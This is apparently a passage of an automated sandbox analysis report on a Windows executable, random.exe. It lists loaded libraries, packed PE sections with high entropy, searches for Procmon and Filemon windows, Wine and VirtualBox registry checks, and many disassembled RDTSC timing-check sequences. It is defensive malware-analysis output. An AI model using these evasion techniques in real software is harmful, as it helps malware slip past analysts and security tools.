      Source: C:\Users\user\Desktop\random.exeSection loaded: schannel.dllJump to behavior
      Source: C:\Users\user\Desktop\random.exeSection loaded: mskeyprotect.dllJump to behavior
      Source: C:\Users\user\Desktop\random.exeSection loaded: ntasn1.dllJump to behavior
      Source: C:\Users\user\Desktop\random.exeSection loaded: ncrypt.dllJump to behavior
      Source: C:\Users\user\Desktop\random.exeSection loaded: ncryptsslp.dllJump to behavior
      Source: C:\Users\user\Desktop\random.exeSection loaded: msasn1.dllJump to behavior
      Source: C:\Users\user\Desktop\random.exeSection loaded: cryptsp.dllJump to behavior
      Source: C:\Users\user\Desktop\random.exeSection loaded: rsaenh.dllJump to behavior
      Source: C:\Users\user\Desktop\random.exeSection loaded: cryptbase.dllJump to behavior
      Source: C:\Users\user\Desktop\random.exeSection loaded: gpapi.dllJump to behavior
      Source: C:\Users\user\Desktop\random.exeSection loaded: dpapi.dllJump to behavior
      Source: C:\Users\user\Desktop\random.exeSection loaded: kernel.appcore.dllJump to behavior
      Source: C:\Users\user\Desktop\random.exeSection loaded: uxtheme.dllJump to behavior
      Source: C:\Users\user\Desktop\random.exeSection loaded: wbemcomn.dllJump to behavior
      Source: C:\Users\user\Desktop\random.exeSection loaded: amsi.dllJump to behavior
      Source: C:\Users\user\Desktop\random.exeSection loaded: userenv.dllJump to behavior
      Source: C:\Users\user\Desktop\random.exeSection loaded: profapi.dllJump to behavior
      Source: C:\Users\user\Desktop\random.exeSection loaded: version.dllJump to behavior
      Source: C:\Users\user\Desktop\random.exeSection loaded: ondemandconnroutehelper.dllJump to behavior
      Source: C:\Users\user\Desktop\random.exeSection loaded: ondemandconnroutehelper.dllJump to behavior
      Source: C:\Users\user\Desktop\random.exeSection loaded: ondemandconnroutehelper.dllJump to behavior
      Source: C:\Users\user\Desktop\random.exeSection loaded: ondemandconnroutehelper.dllJump to behavior
      Source: C:\Users\user\Desktop\random.exeSection loaded: ondemandconnroutehelper.dllJump to behavior
      Source: C:\Users\user\Desktop\random.exeSection loaded: ondemandconnroutehelper.dllJump to behavior
      Source: random.exeStatic file information: File size 1872896 > 1048576
      Source: random.exeStatic PE information: Raw size of zqekczog is bigger than: 0x100000 < 0x197400

      Data Obfuscation

      barindex
      Source: C:\Users\user\Desktop\random.exeUnpacked PE file: 0.2.random.exe.e80000.0.unpack :EW;.rsrc:W;.idata :W; :EW;zqekczog:EW;annrbsan:EW;.taggant:EW; vs :ER;.rsrc:W;.idata :W; :EW;zqekczog:EW;annrbsan:EW;.taggant:EW;
      Source: initial sampleStatic PE information: section where entry point is pointing to: .taggant
      Source: random.exeStatic PE information: real checksum: 0x1cdf16 should be: 0x1cba0d
      Source: random.exeStatic PE information: section name:
      Source: random.exeStatic PE information: section name: .idata
      Source: random.exeStatic PE information: section name:
      Source: random.exeStatic PE information: section name: zqekczog
      Source: random.exeStatic PE information: section name: annrbsan
      Source: random.exeStatic PE information: section name: .taggant
      Source: random.exeStatic PE information: section name: entropy: 7.97933591893857
      Source: random.exeStatic PE information: section name: zqekczog entropy: 7.95352697603957

      Boot Survival

      barindex
      Source: C:\Users\user\Desktop\random.exeWindow searched: window name: FilemonClassJump to behavior
      Source: C:\Users\user\Desktop\random.exeWindow searched: window name: PROCMON_WINDOW_CLASSJump to behavior
      Source: C:\Users\user\Desktop\random.exeWindow searched: window name: RegmonClassJump to behavior
      Source: C:\Users\user\Desktop\random.exeWindow searched: window name: FilemonClassJump to behavior
      Source: C:\Users\user\Desktop\random.exeWindow searched: window name: PROCMON_WINDOW_CLASSJump to behavior
      Source: C:\Users\user\Desktop\random.exeWindow searched: window name: RegmonclassJump to behavior
      Source: C:\Users\user\Desktop\random.exeWindow searched: window name: FilemonclassJump to behavior
      Source: C:\Users\user\Desktop\random.exeWindow searched: window name: PROCMON_WINDOW_CLASSJump to behavior
      Source: C:\Users\user\Desktop\random.exeWindow searched: window name: RegmonclassJump to behavior
      Source: C:\Users\user\Desktop\random.exeProcess information set: NOOPENFILEERRORBOXJump to behavior

      Malware Analysis System Evasion

      barindex
      Source: C:\Users\user\Desktop\random.exeWMI Queries: IWbemServices::ExecQuery - ROOT\CIMV2 : SELECT * FROM Win32_VideoController
      Source: C:\Users\user\Desktop\random.exeSystem information queried: FirmwareTableInformationJump to behavior
      Source: C:\Users\user\Desktop\random.exeFile opened: HKEY_CURRENT_USER\Software\WineJump to behavior
      Source: C:\Users\user\Desktop\random.exeFile opened: HKEY_LOCAL_MACHINE\HARDWARE\ACPI\DSDT\VBOX__Jump to behavior
      Source: C:\Users\user\Desktop\random.exeRDTSC instruction interceptor: First address: EE6011 second address: EE6017 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
      Source: C:\Users\user\Desktop\random.exeRDTSC instruction interceptor: First address: EE6017 second address: EE58CD instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 jmp 00007FA8D8E164B5h 0x0000000a popad 0x0000000b nop 0x0000000c pushad 0x0000000d mov ebx, 5AB8C46Bh 0x00000012 jmp 00007FA8D8E164B8h 0x00000017 popad 0x00000018 push dword ptr [ebp+122D05A5h] 0x0000001e cmc 0x0000001f xor dword ptr [ebp+122D1EF6h], edi 0x00000025 call dword ptr [ebp+122D1FBEh] 0x0000002b pushad 0x0000002c jmp 00007FA8D8E164ABh 0x00000031 xor eax, eax 0x00000033 add dword ptr [ebp+122D1B6Fh], edx 0x00000039 mov edx, dword ptr [esp+28h] 0x0000003d js 00007FA8D8E164ACh 0x00000043 add dword ptr [ebp+122D2B2Dh], eax 0x00000049 mov dword ptr [ebp+122D3679h], eax 0x0000004f mov dword ptr [ebp+122D1913h], eax 0x00000055 mov esi, 0000003Ch 0x0000005a pushad 0x0000005b movzx ebx, cx 0x0000005e and eax, dword ptr [ebp+122D3659h] 0x00000064 popad 0x00000065 add esi, dword ptr [esp+24h] 0x00000069 jmp 00007FA8D8E164B8h 0x0000006e lodsw 0x00000070 jmp 00007FA8D8E164AFh 0x00000075 add eax, dword ptr [esp+24h] 0x00000079 sub dword ptr [ebp+122D201Dh], esi 0x0000007f sub dword ptr [ebp+122D2B2Dh], ecx 0x00000085 mov ebx, dword ptr [esp+24h] 0x00000089 stc 0x0000008a nop 0x0000008b pushad 0x0000008c pushad 0x0000008d pushad 0x0000008e popad 0x0000008f push eax 0x00000090 push edx 0x00000091 rdtsc
      Source: C:\Users\user\Desktop\random.exeRDTSC instruction interceptor: First address: EE58CD second address: EE58E4 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 push eax 0x00000006 push edx 0x00000007 jmp 00007FA8D8E1DD00h 0x0000000c rdtsc
      Source: C:\Users\user\Desktop\random.exeRDTSC instruction interceptor: First address: EE58E4 second address: EE58E8 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
      Source: C:\Users\user\Desktop\random.exeRDTSC instruction interceptor: First address: EE58E8 second address: EE5902 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 popad 0x00000007 push eax 0x00000008 pushad 0x00000009 ja 00007FA8D8E1DCF8h 0x0000000f push esi 0x00000010 pop esi 0x00000011 pushad 0x00000012 jng 00007FA8D8E1DCF6h 0x00000018 push eax 0x00000019 push edx 0x0000001a rdtsc
      Source: C:\Users\user\Desktop\random.exeRDTSC instruction interceptor: First address: 105D029 second address: 105D02D instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
      Source: C:\Users\user\Desktop\random.exeRDTSC instruction interceptor: First address: 105D02D second address: 105D047 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FA8D8E1DD06h 0x00000007 push eax 0x00000008 push edx 0x00000009 rdtsc
      Source: C:\Users\user\Desktop\random.exeRDTSC instruction interceptor: First address: 105C200 second address: 105C207 instructions: 0x00000000 rdtsc 0x00000002 push ebx 0x00000003 pushad 0x00000004 popad 0x00000005 push eax 0x00000006 push edx 0x00000007 rdtsc
      Source: C:\Users\user\Desktop\random.exeRDTSC instruction interceptor: First address: 105C207 second address: 105C210 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop ebx 0x00000005 push eax 0x00000006 push edx 0x00000007 push eax 0x00000008 push edx 0x00000009 rdtsc
      Source: C:\Users\user\Desktop\random.exeRDTSC instruction interceptor: First address: 105C210 second address: 105C214 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
      Source: C:\Users\user\Desktop\random.exeRDTSC instruction interceptor: First address: 105C368 second address: 105C38E instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 jmp 00007FA8D8E1DD00h 0x0000000b jnp 00007FA8D8E1DCF6h 0x00000011 popad 0x00000012 push ecx 0x00000013 jnc 00007FA8D8E1DCF6h 0x00000019 push eax 0x0000001a push edx 0x0000001b rdtsc
      Source: C:\Users\user\Desktop\random.exeRDTSC instruction interceptor: First address: 105C4E6 second address: 105C4EC instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
      Source: C:\Users\user\Desktop\random.exeRDTSC instruction interceptor: First address: 105C4EC second address: 105C4FC instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 js 00007FA8D8E1DD0Ah 0x0000000c push eax 0x0000000d push edx 0x0000000e push eax 0x0000000f push edx 0x00000010 rdtsc
      Source: C:\Users\user\Desktop\random.exeRDTSC instruction interceptor: First address: 105C4FC second address: 105C500 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
      Source: C:\Users\user\Desktop\random.exeRDTSC instruction interceptor: First address: 105C7C7 second address: 105C7CB instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
      Source: C:\Users\user\Desktop\random.exeRDTSC instruction interceptor: First address: 105C90C second address: 105C929 instructions: 0x00000000 rdtsc 0x00000002 jg 00007FA8D8E164A6h 0x00000008 jmp 00007FA8D8E164B3h 0x0000000d pop edx 0x0000000e pop eax 0x0000000f rdtsc
      Source: C:\Users\user\Desktop\random.exeRDTSC instruction interceptor: First address: 105E285 second address: 105E2E2 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FA8D8E1DD07h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 add dword ptr [esp], 1199B93Dh 0x00000010 mov dword ptr [ebp+122D2AFFh], ebx 0x00000016 lea ebx, dword ptr [ebp+1244C0D1h] 0x0000001c push 00000000h 0x0000001e push esi 0x0000001f call 00007FA8D8E1DCF8h 0x00000024 pop esi 0x00000025 mov dword ptr [esp+04h], esi 0x00000029 add dword ptr [esp+04h], 00000017h 0x00000031 inc esi 0x00000032 push esi 0x00000033 ret 0x00000034 pop esi 0x00000035 ret 0x00000036 or edi, dword ptr [ebp+122D34A1h] 0x0000003c push eax 0x0000003d pushad 0x0000003e je 00007FA8D8E1DCFCh 0x00000044 push eax 0x00000045 push edx 0x00000046 rdtsc
      Source: C:\Users\user\Desktop\random.exeRDTSC instruction interceptor: First address: 105E2E2 second address: 105E2FC instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 jmp 00007FA8D8E164B4h 0x0000000b rdtsc
      Source: C:\Users\user\Desktop\random.exeRDTSC instruction interceptor: First address: 105E367 second address: 105E3AD instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jnc 00007FA8D8E1DCF6h 0x0000000a popad 0x0000000b popad 0x0000000c nop 0x0000000d push 00000000h 0x0000000f push edx 0x00000010 call 00007FA8D8E1DCF8h 0x00000015 pop edx 0x00000016 mov dword ptr [esp+04h], edx 0x0000001a add dword ptr [esp+04h], 00000017h 0x00000022 inc edx 0x00000023 push edx 0x00000024 ret 0x00000025 pop edx 0x00000026 ret 0x00000027 stc 0x00000028 push 00000000h 0x0000002a jmp 00007FA8D8E1DCFDh 0x0000002f push D0F41FD6h 0x00000034 push eax 0x00000035 push edx 0x00000036 pushad 0x00000037 push eax 0x00000038 push edx 0x00000039 rdtsc
      Source: C:\Users\user\Desktop\random.exeRDTSC instruction interceptor: First address: 105E3AD second address: 105E3C3 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007FA8D8E164B1h 0x00000009 popad 0x0000000a rdtsc
      Source: C:\Users\user\Desktop\random.exeRDTSC instruction interceptor: First address: 105E3C3 second address: 105E442 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FA8D8E1DD03h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 add dword ptr [esp], 2F0BE0AAh 0x00000010 mov dword ptr [ebp+122D19F8h], eax 0x00000016 mov dword ptr [ebp+122D287Eh], ebx 0x0000001c push 00000003h 0x0000001e call 00007FA8D8E1DCFBh 0x00000023 clc 0x00000024 pop edx 0x00000025 push 00000000h 0x00000027 mov cl, 2Fh 0x00000029 push 00000003h 0x0000002b call 00007FA8D8E1DD01h 0x00000030 jnc 00007FA8D8E1DCFCh 0x00000036 pop esi 0x00000037 call 00007FA8D8E1DCF9h 0x0000003c push eax 0x0000003d push edx 0x0000003e push ebx 0x0000003f jmp 00007FA8D8E1DD05h 0x00000044 pop ebx 0x00000045 rdtsc
      Source: C:\Users\user\Desktop\random.exeRDTSC instruction interceptor: First address: 105E442 second address: 105E4E5 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 ja 00007FA8D8E164A6h 0x00000009 push eax 0x0000000a pop eax 0x0000000b popad 0x0000000c pop edx 0x0000000d pop eax 0x0000000e push eax 0x0000000f jg 00007FA8D8E164B0h 0x00000015 mov eax, dword ptr [esp+04h] 0x00000019 jnl 00007FA8D8E164B8h 0x0000001f mov eax, dword ptr [eax] 0x00000021 pushad 0x00000022 push eax 0x00000023 pushad 0x00000024 popad 0x00000025 pop eax 0x00000026 push eax 0x00000027 jc 00007FA8D8E164A6h 0x0000002d pop eax 0x0000002e popad 0x0000002f mov dword ptr [esp+04h], eax 0x00000033 jmp 00007FA8D8E164ADh 0x00000038 pop eax 0x00000039 push 00000000h 0x0000003b push eax 0x0000003c call 00007FA8D8E164A8h 0x00000041 pop eax 0x00000042 mov dword ptr [esp+04h], eax 0x00000046 add dword ptr [esp+04h], 0000001Ch 0x0000004e inc eax 0x0000004f push eax 0x00000050 ret 0x00000051 pop eax 0x00000052 ret 0x00000053 mov dword ptr [ebp+122D1FA7h], ebx 0x00000059 mov ecx, dword ptr [ebp+122D37E5h] 0x0000005f lea ebx, dword ptr [ebp+1244C0DAh] 0x00000065 mov edi, 77043047h 0x0000006a xchg eax, ebx 0x0000006b jbe 00007FA8D8E164B4h 0x00000071 push eax 0x00000072 push edx 0x00000073 pushad 0x00000074 popad 0x00000075 rdtsc
      Source: C:\Users\user\Desktop\random.exeRDTSC instruction interceptor: First address: 105E4E5 second address: 105E4E9 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
      Source: C:\Users\user\Desktop\random.exeRDTSC instruction interceptor: First address: 105E56F second address: 105E5C7 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FA8D8E164B4h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 nop 0x0000000a push 00000000h 0x0000000c push ebx 0x0000000d call 00007FA8D8E164A8h 0x00000012 pop ebx 0x00000013 mov dword ptr [esp+04h], ebx 0x00000017 add dword ptr [esp+04h], 00000018h 0x0000001f inc ebx 0x00000020 push ebx 0x00000021 ret 0x00000022 pop ebx 0x00000023 ret 0x00000024 mov ecx, dword ptr [ebp+122D1F1Dh] 0x0000002a push 00000000h 0x0000002c push ebx 0x0000002d mov dh, DCh 0x0000002f pop ecx 0x00000030 push B4297ECEh 0x00000035 jl 00007FA8D8E164C6h 0x0000003b push eax 0x0000003c push edx 0x0000003d jng 00007FA8D8E164A6h 0x00000043 rdtsc
      Source: C:\Users\user\Desktop\random.exeRDTSC instruction interceptor: First address: 10446CC second address: 10446D0 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
      Source: C:\Users\user\Desktop\random.exeRDTSC instruction interceptor: First address: 10446D0 second address: 10446D4 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
      Source: C:\Users\user\Desktop\random.exeRDTSC instruction interceptor: First address: 107D836 second address: 107D83F instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 push edx 0x00000007 pop edx 0x00000008 popad 0x00000009 rdtsc
      Source: C:\Users\user\Desktop\random.exeRDTSC instruction interceptor: First address: 107D83F second address: 107D849 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jnl 00007FA8D8E164A6h 0x0000000a rdtsc
      Source: C:\Users\user\Desktop\random.exeRDTSC instruction interceptor: First address: 107D849 second address: 107D84D instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
      Source: C:\Users\user\Desktop\random.exeRDTSC instruction interceptor: First address: 107D84D second address: 107D85E instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 pushad 0x00000009 push eax 0x0000000a push edx 0x0000000b jo 00007FA8D8E164A6h 0x00000011 rdtsc
      Source: C:\Users\user\Desktop\random.exeRDTSC instruction interceptor: First address: 107D85E second address: 107D89F instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 jbe 00007FA8D8E1DD15h 0x0000000c jmp 00007FA8D8E1DD09h 0x00000011 jno 00007FA8D8E1DCF6h 0x00000017 jno 00007FA8D8E1DCFCh 0x0000001d push eax 0x0000001e push edx 0x0000001f je 00007FA8D8E1DCF6h 0x00000025 push eax 0x00000026 pop eax 0x00000027 rdtsc
      Source: C:\Users\user\Desktop\random.exeRDTSC instruction interceptor: First address: 107D9DD second address: 107D9E9 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push ecx 0x00000005 pop ecx 0x00000006 popad 0x00000007 pushad 0x00000008 push ebx 0x00000009 pop ebx 0x0000000a push eax 0x0000000b push edx 0x0000000c rdtsc
      Source: C:\Users\user\Desktop\random.exeRDTSC instruction interceptor: First address: 107DE20 second address: 107DE31 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007FA8D8E1DCFDh 0x00000009 rdtsc
      Source: C:\Users\user\Desktop\random.exeRDTSC instruction interceptor: First address: 107DE31 second address: 107DE3E instructions: 0x00000000 rdtsc 0x00000002 jp 00007FA8D8E164A6h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a pushad 0x0000000b push eax 0x0000000c push edx 0x0000000d rdtsc
      Source: C:\Users\user\Desktop\random.exeRDTSC instruction interceptor: First address: 107E13A second address: 107E145 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edi 0x00000005 popad 0x00000006 pushad 0x00000007 push eax 0x00000008 push edx 0x00000009 push eax 0x0000000a push edx 0x0000000b rdtsc
      Source: C:\Users\user\Desktop\random.exeRDTSC instruction interceptor: First address: 107E145 second address: 107E14B instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
      Source: C:\Users\user\Desktop\random.exeRDTSC instruction interceptor: First address: 10761CD second address: 10761FC instructions: 0x00000000 rdtsc 0x00000002 ja 00007FA8D8E1DD02h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a push eax 0x0000000b push edx 0x0000000c jmp 00007FA8D8E1DD04h 0x00000011 pushad 0x00000012 push eax 0x00000013 push edx 0x00000014 rdtsc
      Source: C:\Users\user\Desktop\random.exeRDTSC instruction interceptor: First address: 10761FC second address: 1076219 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007FA8D8E164B6h 0x00000009 pushad 0x0000000a popad 0x0000000b popad 0x0000000c rdtsc
      Source: C:\Users\user\Desktop\random.exeRDTSC instruction interceptor: First address: 1076219 second address: 1076235 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007FA8D8E1DD06h 0x00000009 push eax 0x0000000a push edx 0x0000000b rdtsc
      Source: C:\Users\user\Desktop\random.exeRDTSC instruction interceptor: First address: 1076235 second address: 1076239 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
      Source: C:\Users\user\Desktop\random.exeRDTSC instruction interceptor: First address: 1076239 second address: 1076243 instructions: 0x00000000 rdtsc 0x00000002 jne 00007FA8D8E1DCF6h 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
      Source: C:\Users\user\Desktop\random.exeRDTSC instruction interceptor: First address: 1047CC7 second address: 1047CCD instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
      Source: C:\Users\user\Desktop\random.exeRDTSC instruction interceptor: First address: 1047CCD second address: 1047CEC instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push edx 0x00000005 jmp 00007FA8D8E1DD08h 0x0000000a push eax 0x0000000b push edx 0x0000000c rdtsc
      Source: C:\Users\user\Desktop\random.exeRDTSC instruction interceptor: First address: 107F2D9 second address: 107F307 instructions: 0x00000000 rdtsc 0x00000002 jnc 00007FA8D8E164A6h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a jmp 00007FA8D8E164B6h 0x0000000f pop edi 0x00000010 push eax 0x00000011 push eax 0x00000012 push edx 0x00000013 jmp 00007FA8D8E164AAh 0x00000018 rdtsc
      Source: C:\Users\user\Desktop\random.exeRDTSC instruction interceptor: First address: 1081668 second address: 108166C instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
      Source: C:\Users\user\Desktop\random.exeRDTSC instruction interceptor: First address: 108166C second address: 1081675 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push ebx 0x00000007 push eax 0x00000008 push edx 0x00000009 rdtsc
      Source: C:\Users\user\Desktop\random.exeRDTSC instruction interceptor: First address: 104621B second address: 104622D instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jnl 00007FA8D8E1DCF6h 0x0000000a pushad 0x0000000b popad 0x0000000c popad 0x0000000d push ebx 0x0000000e push ebx 0x0000000f pop ebx 0x00000010 push eax 0x00000011 push edx 0x00000012 rdtsc
      Source: C:\Users\user\Desktop\random.exeRDTSC instruction interceptor: First address: 104622D second address: 1046235 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop ebx 0x00000005 pushad 0x00000006 push eax 0x00000007 push edx 0x00000008 rdtsc
      Source: C:\Users\user\Desktop\random.exeRDTSC instruction interceptor: First address: 1046235 second address: 104623B instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
      Source: C:\Users\user\Desktop\random.exeRDTSC instruction interceptor: First address: 104623B second address: 1046241 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
      Source: C:\Users\user\Desktop\random.exeRDTSC instruction interceptor: First address: 1046241 second address: 1046247 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
      Source: C:\Users\user\Desktop\random.exeRDTSC instruction interceptor: First address: 1046247 second address: 1046252 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 push eax 0x00000006 push edx 0x00000007 pushad 0x00000008 popad 0x00000009 push eax 0x0000000a push edx 0x0000000b rdtsc
      Source: C:\Users\user\Desktop\random.exeRDTSC instruction interceptor: First address: 1046252 second address: 1046256 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
      Source: C:\Users\user\Desktop\random.exeRDTSC instruction interceptor: First address: 1086B6E second address: 1086B74 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
      Source: C:\Users\user\Desktop\random.exeRDTSC instruction interceptor: First address: 10872BA second address: 108731B instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FA8D8E1DD00h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 popad 0x0000000a push eax 0x0000000b push eax 0x0000000c pushad 0x0000000d pushad 0x0000000e popad 0x0000000f jnl 00007FA8D8E1DCF6h 0x00000015 popad 0x00000016 pop eax 0x00000017 mov eax, dword ptr [esp+04h] 0x0000001b pushad 0x0000001c jng 00007FA8D8E1DCFCh 0x00000022 jg 00007FA8D8E1DCF6h 0x00000028 jmp 00007FA8D8E1DD05h 0x0000002d popad 0x0000002e mov eax, dword ptr [eax] 0x00000030 pushad 0x00000031 jmp 00007FA8D8E1DD01h 0x00000036 push eax 0x00000037 push edx 0x00000038 push eax 0x00000039 push edx 0x0000003a rdtsc
      Source: C:\Users\user\Desktop\random.exeRDTSC instruction interceptor: First address: 108731B second address: 108731F instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
      Source: C:\Users\user\Desktop\random.exeRDTSC instruction interceptor: First address: 108731F second address: 1087323 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
      Source: C:\Users\user\Desktop\random.exeRDTSC instruction interceptor: First address: 10874BF second address: 10874C4 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
      Source: C:\Users\user\Desktop\random.exeRDTSC instruction interceptor: First address: 108ACD2 second address: 108ACD8 instructions: 0x00000000 rdtsc 0x00000002 push edi 0x00000003 pop edi 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
      Source: C:\Users\user\Desktop\random.exeRDTSC instruction interceptor: First address: 108C7D8 second address: 108C7DC instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
      Source: C:\Users\user\Desktop\random.exeRDTSC instruction interceptor: First address: 108C8D7 second address: 108C8EC instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007FA8D8E1DD01h 0x00000009 rdtsc
      Source: C:\Users\user\Desktop\random.exeRDTSC instruction interceptor: First address: 108CFD5 second address: 108CFD9 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
      Source: C:\Users\user\Desktop\random.exeRDTSC instruction interceptor: First address: 108CFD9 second address: 108D01E instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pushad 0x00000007 jnl 00007FA8D8E1DCF6h 0x0000000d jmp 00007FA8D8E1DD06h 0x00000012 popad 0x00000013 popad 0x00000014 push eax 0x00000015 push esi 0x00000016 jmp 00007FA8D8E1DD06h 0x0000001b pop esi 0x0000001c xchg eax, ebx 0x0000001d cmc 0x0000001e push eax 0x0000001f push esi 0x00000020 push edx 0x00000021 push eax 0x00000022 push edx 0x00000023 rdtsc
      Source: C:\Users\user\Desktop\random.exeRDTSC instruction interceptor: First address: 108D1F7 second address: 108D21C instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 jmp 00007FA8D8E164ADh 0x00000008 pushad 0x00000009 popad 0x0000000a popad 0x0000000b pop edx 0x0000000c pop eax 0x0000000d push eax 0x0000000e push eax 0x0000000f push edx 0x00000010 jmp 00007FA8D8E164ADh 0x00000015 rdtsc
      Source: C:\Users\user\Desktop\random.exeRDTSC instruction interceptor: First address: 108D399 second address: 108D39F instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
      Source: C:\Users\user\Desktop\random.exeRDTSC instruction interceptor: First address: 108D39F second address: 108D3BA instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FA8D8E164AAh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 pop edx 0x0000000a pop eax 0x0000000b push eax 0x0000000c push eax 0x0000000d push edx 0x0000000e jno 00007FA8D8E164A8h 0x00000014 pushad 0x00000015 popad 0x00000016 rdtsc
      Source: C:\Users\user\Desktop\random.exeRDTSC instruction interceptor: First address: 108D647 second address: 108D64D instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
      Source: C:\Users\user\Desktop\random.exeRDTSC instruction interceptor: First address: 108D64D second address: 108D652 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 rdtsc
